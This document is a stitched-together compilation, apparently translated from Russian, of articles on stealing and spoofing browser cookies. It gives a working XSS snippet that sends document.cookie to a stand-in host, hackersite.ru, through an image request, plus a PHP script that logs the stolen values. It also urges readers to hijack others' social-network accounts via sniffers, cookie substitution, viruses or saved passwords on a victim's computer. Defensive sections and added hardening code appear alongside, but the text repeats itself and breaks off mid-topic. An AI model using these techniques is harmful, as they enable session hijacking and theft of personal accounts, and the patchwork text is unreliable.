Download a program to steal cookies. An easy way to steal a cookie. Cookie Hacking Tools and Techniques

What is a cookie?

There is a mechanism that allows an HTTP server to store a small piece of text on the user's computer and read it back on later requests. This information is called a cookie. Each cookie is a pair: the name of the parameter and its value. Each cookie is also assigned the domain to which it belongs; for security, every browser lets an HTTP server access only the cookies of its own domain. Cookies can also carry an expiration date, in which case they are kept on the computer until that date even after all browser windows are closed.


Why are cookies important?

In all multi-user systems, cookies are used to identify the user, or rather the user's current connection with the service: the user session. Anyone who learns your cookies can log in on your behalf, because at present very few Internet resources check whether the IP address changes during a single user session.


How to view or change cookies?

Browser developers do not provide built-in tools for editing cookies, but you can get by with the ordinary Notepad.


Step 1: create a text file with the following text (the key line is the standard Internet Explorer context-menu extension key, HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt; its last component is the menu item name used in Step 5):

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Working with Cookies]
@="C:\\IE_ext.htm"

Save it under the name IE_ext.reg

Step 2: Import the created file into the Windows registry.

Step 3: create a text file with the following text

<script language="javascript">
// show the cookies before the change (see Step 6)
alert(external.menuArguments.document.cookie);
// copy the page's cookies to the clipboard
external.menuArguments.clipboardData.setData("Text", external.menuArguments.document.cookie);

// set (or overwrite) one cookie for the site
external.menuArguments.document.cookie = "testname=testvalue; path=/; domain=testdomain.ru";
// show the cookies after the change
alert(external.menuArguments.document.cookie);
</script>

Save it as C:\IE_ext.htm

Step 4: Open the website of interest.

Step 5: Right-click on an empty area of the page and select the "Working with Cookies" menu item. Allow access to the clipboard. Your cookies for this site are now on the clipboard; you can paste them into Notepad and look at them.


Step 6: To change a cookie, edit the file C:\IE_ext.htm, replacing testname with the cookie's name, testvalue with its value, and testdomain.ru with the site's domain. Add more lines like this if necessary. For ease of checking, I added output of the current cookies to the script before and after the change: alert(external.menuArguments.document.cookie);

Step 7: Repeat Step 5 and then refresh the page.

Bottom line: we are now on this Internet resource with updated cookies.

How to steal cookies with JavaScript?

If an attacker has found a way to execute arbitrary JavaScript on the victim's computer, reading the current cookies is trivial. Example:


var str = document.cookie;

But can he transfer them to his own site, given that, as I pointed out earlier, a JavaScript script cannot access a site in another domain without additional confirmation? It turns out that a JavaScript script can load any image from any HTTP server and, at the same time, pass arbitrary text in the request for that picture. Example: http://hackersite.ru/xss.jpg?text_info So if you run this code:

var img = new Image();

img.src = "http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);


then the cookies will be in the request to download the "picture" and "leave" to the attacker.

How to handle such requests for the "picture"?

An attacker only needs hosting with PHP support and code like this:

<?php
$uid = urldecode($_SERVER["QUERY_STRING"]);
$fp = fopen("log.txt", "a");
fputs($fp, "$uid\n");
fclose($fp);
?>

Then all query parameters passed to this script are saved in the file log.txt. It remains only to replace http://hackersite.ru/xss.jpg in the JavaScript above with the path to this PHP script.


Outcome

I have shown only the simplest way to exploit XSS vulnerabilities, but it proves that even one such vulnerability on a multi-user Internet site can let an attacker use its resources on your behalf.

The picture shows that the cookie contains the string wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. This value sits in the cookie unencrypted and is easy to intercept with the Achilles utility, although as a rule in most cases only the hash of a particular entry is visible in Achilles. Before sending the request to the server, you can try replacing this string with any similar one (although in this case that makes no sense); the number of attempts is not limited. Then, by sending the request to the server with the Send button, you can get a response from the server that was destined for the administrator.

In the previous example, direct user ID spoofing can be used. In addition, the parameter whose value substitution gives a hacker extra capabilities can be named: user (for example, USER=JDOE), any expression containing an ID string (for example, USER=JDOE or SESSIONID=BLAHBLAH), admin (for example, ADMIN=TRUE), session (for example, SESSION=ACTIVE), cart (for example, CART=FULL), as well as values such as TRUE, FALSE, ACTIVE, INACTIVE. The format of cookies typically depends heavily on the application that uses them, but these tips for finding application flaws through cookies work for almost all formats.

Countermeasures against extracting information from cookies performed on the client side

In general, users should be wary of Web sites that use cookies for authentication and for storing sensitive data. Remember too that a Web site that uses cookies for authentication must at least support SSL to encrypt the username and password, because without it the data is transmitted in the clear and can be intercepted with simple software for viewing data sent over the network.

Kookaburra Software has developed a tool to make cookies easier to manage. The tool is called CookiePal (http://www.kburra.com/cpal.html). This program alerts the user when a Web site attempts to set a cookie on the machine, and the user can choose to allow or deny this action. Similar cookie blocking features are available in all browsers today.

Another reason to install web browser updates regularly is that security flaws in these programs are constantly being discovered. For example, Bennett Haselton and Jamie McCarthy created a script that retrieves cookies from a client's machine when a link is clicked. As a result, the entire contents of the cookies on the user's machine become available.

This kind of hack can also be done with the descriptor

To keep such things from threatening our personal data, I myself always update software that handles HTML (e-mail clients, media players, browsers, etc.), and I advise everyone to do the same.

Many people prefer to simply block cookies; however, most Web sites require cookies in order to be browsed. Conclusion: if an innovative technology that does without cookies appears in the near future, programmers and administrators will breathe a sigh of relief, but for now cookies remain a tasty morsel for a hacker, because a better alternative does not yet exist.

Server Side Countermeasures

In the case of server security recommendations, experts give one simple advice: do not use the cookie mechanism unless absolutely necessary! Particular care must be taken when using cookies that remain on the user's system after the session has ended.

Of course, cookies can legitimately be used on Web servers to authorize users. If the application you are developing does need cookies, configure the mechanism so that each session uses different keys with a short validity period, and avoid putting information in these files that hackers could use (such as ADMIN=TRUE).

In addition, for greater security when working with cookies, you can use encryption to prevent sensitive information from being extracted. Encryption does not solve every security problem with cookies, but it does prevent the simplest attacks described above.

Have you noticed that when you return to a site you have already visited, the site recognizes you and opens with the settings you applied last time? Quite often, yes? This happens thanks to cookies, which store information about visitors such as login, password, session ID and other variables needed to identify the visitor and display page content according to the preferences the user chose on the last visit. The WebCookiesSniffer program shows the user the cookies, and their contents, of the sites viewed in the browser.

Viewing Cookies

You open a website and WebCookiesSniffer captures cookies in real time. The utility adds every captured cookie to a table that records the host, the request path, the total length of the cookie, the number of variables in it, and the Cookie string itself with variable names and values. WebCookiesSniffer can save the collected cookie information to a text file and can also generate an HTML report on all or selected cookies. For the program to work, the WinPcap driver must be installed (it is in the archive together with WebCookiesSniffer). To switch WebCookiesSniffer's interface to Russian, copy the file WebCookiesSniffer_lng.ini (also in the archive) into the utility's directory.

Screenshots of WebCookiesSniffer



Ways to steal cookies

Cookie hacking works great and is used by many hackers. If you also want to try it, but do not know what to do, read our recommendations.

What are cookies?

This is information about a user's visits to a particular site, kept in a separate text document. It can hold a variety of information, including logins, passwords, e-mail addresses and phone numbers. That is why burglars try to get their hands on these documents, and they resort to different methods to steal the material they want.

Ways to steal cookies

XSS vulnerability

It can be found and used on any site. When a specialist finds a vulnerability, he injects special code into it. The code differs depending on the purpose and is written for the specific resource. When the user visits this page and refreshes it, all changes take effect: the code starts to act, is introduced into the victim's computer and collects all the necessary information from the browser.

To inject code, any type of vulnerability can be used: an error on the web resource, in the browser or in the computer's system.

There are 2 types of XSS attacks:

Passive: directed at the page script. In this case you need to look for vulnerabilities in page elements, for example a dialog tab, a search box, a video catalog, etc.

Active: these should be looked for on the server. They are especially common on various forums, blogs and chats.
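The "search box" case from the passive type above, and the forum/blog comment case from the active type, shown as the vulnerable template next to its hardened form. This is an added example, not code from the original page; the input string is constructed and no real site is involved.

```python
# Added example (not from the original page): the reflected ("passive") search
# box and the stored ("active") comment list, vulnerable vs hardened.
import html
import re

# Constructed attacker-style input: closes the value attribute, then injects a tag.
SAMPLE_QUERY = 'shoes"><script>alert(1)</script>'

def render_search_vulnerable(query: str) -> str:
    """Echoes the query straight into attribute and text context: the XSS bug."""
    return (
        '<input name="q" value="' + query + '">'
        '<p>Results for ' + query + '</p>'
    )

def render_search_hardened(query: str) -> str:
    """Same page, but the query is entity-encoded for both contexts."""
    safe = html.escape(query, quote=True)   # & < > " ' become entities
    return (
        '<input name="q" value="' + safe + '">'
        '<p>Results for ' + safe + '</p>'
    )

def render_comments_hardened(comments) -> str:
    """Stored variant: every persisted comment is escaped at output time,
    so a payload saved on the server never becomes live markup."""
    return "".join("<li>%s</li>" % html.escape(c, quote=True) for c in comments)

# A real <script tag (not an entity-encoded one) indicates executable injection.
SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)

def has_live_script(page: str) -> bool:
    """Output check used to compare the two renderings."""
    return SCRIPT_TAG.search(page) is not None
```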

How to force a person to apply XSS?

The task is not easy, because the link with it often has to be clicked to activate the code. The link can be disguised and sent in a letter with an attractive offer, for example a big discount in an online store. All of this can also be embedded in a picture; the user is very likely to view it without suspecting anything.

Installing a sniffer

This is the introduction of specialized programs for monitoring traffic on someone else's device. A sniffer intercepts transmitted sessions containing other people's data, so you can obtain logins and passwords, addresses and any other important information the user sends over the network. Attacks are most often carried out on unprotected HTTP data; unsecured Wi-Fi works well for this.

There are several ways to implement a sniffer:

  • Copy traffic;
  • Data analysis using traffic attacks;
  • Listening to interfaces;
  • Implementation of a sniffer into a channel break.

Cookie substitution

All data is stored on the web server in its original form; changing it counts as substitution. The received material can be used on another computer, giving full access to the user's personal data. Cookies can be modified through browser settings, add-ons or special programs; editing is also possible in any standard notepad on a PC.

Stealing cookies with a virus

Experts advise not using cookies unless there is a real need. If they can be disabled, it is best to do so, because cookies are very vulnerable and are often stolen by thieves; from these files a huge amount of sensitive personal information can be obtained and used against a person. The most dangerous are the files that remain in the system after the session has ended.

Cookies are often stolen with a virus utility. This is done quite simply: a virus that collects certain material on the computer is embedded in some harmless-looking utility. The virus program connects to its owner's server and must be configured so that the browser uses it as a proxy server.

When the program gets on the victim's PC, it will automatically start collecting all the stored data and send it to you.

Viruses are different, their functions may also differ. Some allow you to completely control the browser and view any information. Others are capable of stealing protected materials. Still others collect only unsecured data.

You may have difficulty getting the virus program onto someone else's computer: the user has to be made to download and run it. You can either send him a letter with a link to the program, or pass the program off as safe and wait for the person to download it from your site.

How to protect cookies from theft?

Most of the web resources are not secure enough. Hackers easily find vulnerabilities and bugs on these platforms.

Cookie protection rules:

  1. Bind the computer ID to the current session. Then, when the site is entered from a third-party device, a new session starts and data from the previous one cannot be retrieved.
  2. Bind the session to the browser. The same principle as in the previous point applies.
  3. Encrypt the parameters transmitted over the network. Then the information stored in the document cannot be understood and is useless to whoever intercepted it. This technique does not protect you 100%; some experts can decipher any material.
  4. Create a separate folder for indexes.
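A session cookie built the way the "Server Side Countermeasures" section and rules 1 to 3 above ask for: a fresh random key per session, a short validity period, the value authenticated so a client cannot flip a field like ADMIN=TRUE, and the session bound to the browser that started it; the HttpOnly flag also keeps document.cookie (the XSS case earlier on the page) from reading it. This is an added example, not the page's code: the server key, user names and user agents are constructed, and binding uses the User-Agent string as a stand-in for a browser/device identifier.

```python
# Added example (not from the original page): hardened session cookie issuance
# and validation with HMAC integrity, short TTL and browser binding.
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

SERVER_KEY = secrets.token_bytes(32)   # constructed; a real server loads it from config
SESSION_TTL = 15 * 60                  # short validity period, in seconds
COOKIE_NAME = "sid"

def _sign(payload: str) -> str:
    """HMAC-SHA256 over the payload: a client cannot change any field unnoticed."""
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()

def _browser_tag(user_agent: str) -> str:
    """Binds the session to the browser without storing the raw User-Agent."""
    return hashlib.sha256(user_agent.encode()).hexdigest()[:16]

def issue_session(user: str, role: str, user_agent: str, now: float) -> str:
    """Returns the Set-Cookie header value for a new session.
    Assumes user and role contain no '|' (the field separator)."""
    payload = "|".join([
        secrets.token_urlsafe(24),       # unpredictable, different key per session
        user, role,
        str(int(now) + SESSION_TTL),     # absolute expiry enforced server-side
        _browser_tag(user_agent),
    ])
    value = payload + "." + _sign(payload)
    c = SimpleCookie()
    c[COOKIE_NAME] = value
    c[COOKIE_NAME]["httponly"] = True   # not readable via document.cookie
    c[COOKIE_NAME]["secure"] = True     # never sent over plaintext HTTP
    c[COOKIE_NAME]["samesite"] = "Strict"
    c[COOKIE_NAME]["max-age"] = SESSION_TTL
    c[COOKIE_NAME]["path"] = "/"
    return c.output(header="").strip()

def validate_session(cookie_header: str, user_agent: str, now: float):
    """Parses a Cookie: header; returns (user, role) or None when rejected."""
    c = SimpleCookie()
    c.load(cookie_header)
    if COOKIE_NAME not in c:
        return None
    payload, sep, mac = c[COOKIE_NAME].value.rpartition(".")
    if not sep or not hmac.compare_digest(mac, _sign(payload)):
        return None                      # tampered (e.g. role edited) or forged
    _sid, user, role, expires, tag = payload.split("|")
    if now > int(expires):
        return None                      # expired: short TTL limits replay window
    if tag != _browser_tag(user_agent):
        return None                      # replayed from a different browser
    return user, role
```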

How to find out the password from someone else's account through cookies?

To get someone else's data for authorization, you must first get to the file in which they were saved.

Mozilla Firefox users need to open the Tools tab in the main menu. Then, in the settings, find the "Protection" section, where all the important information about social-network accounts is kept. All passwords are hidden, so click the "show" button. Here you can also set protection with a special code; then nobody but you can get this information.

In Opera, only usernames are visible in general view, but the password manager in the menu shows everything stored on the computer; the full list is in the manager. To gain access to passwords you need to install an additional extension.

In Google Chrome all these materials can be seen in the advanced settings, where there is a tab with all saved cookies.

Unfortunately the standard Internet Explorer browser has no such feature. To find out about the web platforms visited by the PC's owner, you need to download a special program. It can be found on the Internet for free and is completely safe, but it is better to download it from trusted sources. Do not forget that any program should be checked with an antivirus; this is especially true of utilities that work with passwords.

This technique is only suitable for those who have physical access to the victim's computer. You can also find out someone else's password if the person logged in to the platform through your PC and saved his data.

Programs to steal cookies

There are many hacker forums on the Internet where hackers communicate with each other. People go there hoping to get free help, and that is where you can find a huge number of different hacking programs. We want to warn you not to trust these programs: utilities for remotely stealing cookies from someone else's device are dummies or virus programs. If you download such software to your PC, most likely you yourself will fall into a scammer's trap. Crooks post their programs for free; this is how they distribute virus software and gain control over other people's PCs. In general, such programs are a scam, as you will see from their interface and content. If you are going to use any software for extracting files, let it be sniffers. Of course, they are not easy to use, and a good sniffer is not easy to find on the Internet, but such software is available from specialists who will sell it for money. Remember that there are many scammers, each with their own tricks; trust only proven hackers with a good reputation, reviews and their own website.

In conclusion, I would note that stealing cookies is a really powerful method with very high effectiveness. If you want to hack someone's profile on a social network or messenger, be sure to consider this option. It works best when you can use the victim's computer; getting the material remotely is much harder, but you can take our advice and try to put the method into practice.


Have you ever wondered how some Web sites personalize visitors? This may show up, for example, in remembering the contents of the "cart" (if the site sells goods) or in how the fields of some form are filled in. The HTTP protocol that underpins the World Wide Web has no means of tracking events from one site visit to the next, so a special add-on was developed to store such "state". This mechanism, described in RFC 2109, inserts special pieces of cookie data into transmitted HTTP requests and responses that allow Web sites to track their visitors.

These cookies may be remembered for the duration of the session (per session), staying in RAM within a single session and being deleted when the browser is closed or after a specified amount of time; or they may be permanent (persistent), remaining on the user's hard disk as a text file. They are usually stored in the Cookies directory (%windir%\Cookies on Win9x and %userprofile%\Cookies on NT/2000). It is not hard to guess that after hijacking cookies on the Internet, an attacker can impersonate the user of this computer or collect important information contained in these files. After reading the following sections, you will understand how easy this is.

Interception of cookies

The most direct way is to intercept cookies as they are transmitted over the network; the intercepted data can then be used when logging into the corresponding server. Any packet capture utility can do this, but one of the best is Laurentiu Nicula's SpyNet/PeepNet. SpyNet includes two utilities that work together: CaptureNet captures the packets themselves and saves them to disk, and PeepNet opens the file and converts it into a readable format. The following example is a fragment of a session reconstructed by PeepNet in which a cookie is used to authenticate and control access to browsed pages (names have been changed to preserve anonymity).

GET http://www.victim.net/images/logo.gif HTTP/1.0
Accept: */*
Referrer: http://www.victim.net/
Host: www.victim.net
Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

In the example above, you can see a cookie fragment placed in an HTTP request to the server. The most important field is cuid=, which holds the unique identifier used to authenticate the user to www.victim.net. Suppose the attacker then visits victim.net himself and obtains his own identifier and cookie (assuming the host writes the cookie to the hard disk rather than keeping it only in memory). The attacker can then open his own cookie and replace the identifier in its cuid= field with the one from the captured packet. When logging into the victim.net server, he will then be treated as the user whose cookie data was intercepted.

PeepNet's ability to replay an entire communication session, or a fragment of it, makes attacks of this type much easier. With the Go get it! button, the pages the user viewed can be retrieved again using the cookie data intercepted earlier by CaptureNet. In the PeepNet dialog box you can see information about someone's completed orders; here the cookie data intercepted by CaptureNet is used for authentication. Notice the frame in the lower right corner of the session data dialog and the line following the Cookie: line: this is the cookie data used in authentication.

This is a pretty neat trick. In addition, CaptureNet can provide a complete transcript of the traffic, almost equivalent to the capabilities of professional-grade utilities such as Sniffer Pro from Network Associates, Inc. But SpyNet is even better: you can get it for free!

Countermeasures

Beware of sites that use cookies to authenticate and store sensitive identification data. One tool that helps protect you is Kookaburra Software's Cookie Pal, available at http://www.kburra.com/cpal.html. It can be configured to warn the user when a Web site tries to use the cookie mechanism; you can then "look behind the scenes" and decide whether to allow the action. Internet Explorer has a built-in cookie control mechanism: open the Control Panel's Internet Options applet, go to the Security tab, select the Internet zone, choose Custom Level, and set the switch to Prompt for persistent and temporary cookie data. In the Netscape browser, cookies are controlled with Edit › Preferences › Advanced and the Warn me before accepting a cookie or Disable cookies setting (Fig. 16.3). When accepting a cookie, check whether it is written to disk and whether the Web site collects information about users.

When visiting a site where cookies are used for authentication, make sure that the name and password initially sent are encrypted with at least SSL; then this information will at least not appear in plain text in the PeepNet window.

The authors would prefer to refuse cookies completely if many frequently visited Web sites did not require them. For example, Microsoft's popular worldwide Hotmail service requires cookies for registration. Since this service uses several different servers in the authentication process, adding them to the Trusted Sites zone is not easy (the process is described in "Using Security Zones Wisely: A Common Solution to the ActiveX Control Problem"); here the designation *.hotmail.com helps. Cookies are far from a perfect solution to the incompleteness of the HTML protocol, but the alternatives seem even worse (for example, adding to the URL an identifier that can then be stored on proxy servers). Until a better idea comes along, the only way out is to control cookies using the methods listed above.
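A small check in the spirit of the SSL advice above, run over a captured request of the kind PeepNet reconstructs: it parses a raw HTTP/1.x request, reads the Cookie: header and reports cookies that look like session identifiers travelling over plaintext HTTP. This is an added example, not the book's code; the request text is constructed to mirror the captured fragment, and the name hints are an assumption.

```python
# Added example (not from the original page): detector for session-looking
# cookies sent over cleartext HTTP, run over a constructed captured request.

# Constructed sample mirroring the PeepNet fragment above.
SAMPLE_REQUEST_HTTP = (
    "GET http://www.victim.net/images/logo.gif HTTP/1.0\r\n"
    "Accept: */*\r\n"
    "Referer: http://www.victim.net/\r\n"
    "Host: www.victim.net\r\n"
    "Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah\r\n"
    "\r\n"
)
# Same request, but the absolute URI says it went over TLS.
SAMPLE_REQUEST_HTTPS = SAMPLE_REQUEST_HTTP.replace("GET http://", "GET https://")

# Assumed substrings that usually mark authentication/session cookies.
SESSION_NAME_HINTS = ("sess", "sid", "uid", "auth", "token", "logged_in")

def parse_request(raw: str):
    """Returns (method, target, headers) from a raw HTTP/1.x request head."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def parse_cookie_header(value: str) -> dict:
    """Splits 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    pairs = [p.strip() for p in value.split(";") if p.strip()]
    return {k.strip(): v.strip() for k, _, v in (p.partition("=") for p in pairs)}

def cleartext_session_cookies(raw: str, over_tls: bool = False) -> list:
    """Names of session-looking cookies that were sent without TLS.
    Proxy-style requests carry the scheme in the target; for an origin-form
    target ('/path') the caller states whether the socket was TLS."""
    _method, target, headers = parse_request(raw)
    t = target.lower()
    if t.startswith("http://"):
        tls = False
    elif t.startswith("https://"):
        tls = True
    else:
        tls = over_tls
    if tls or "cookie" not in headers:
        return []
    cookies = parse_cookie_header(headers["cookie"])
    return [n for n in cookies if any(h in n.lower() for h in SESSION_NAME_HINTS)]
```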

Capture cookies via URL

Imagine something horrifying: Internet Explorer users click on specially crafted hyperlinks and become potential victims, risking having their cookies intercepted. Bennett Haselton and Jamie McCarthy of Peacefire, a teen organization that advocates freedom of communication over the Internet, have published a script that brings this idea to life. The script retrieves cookies from the client computer if its user clicks a link contained in the page. As a result, the cookie's content becomes available to the operators of the Web site.

This feature can be misused by embedding IFRAME tags in the HTML code of a Web page, an HTML e-mail message or a newsgroup message. The following example, provided by security consultant Richard M. Smith, demonstrates the use of IFRAME tags with a utility developed by Peacefire.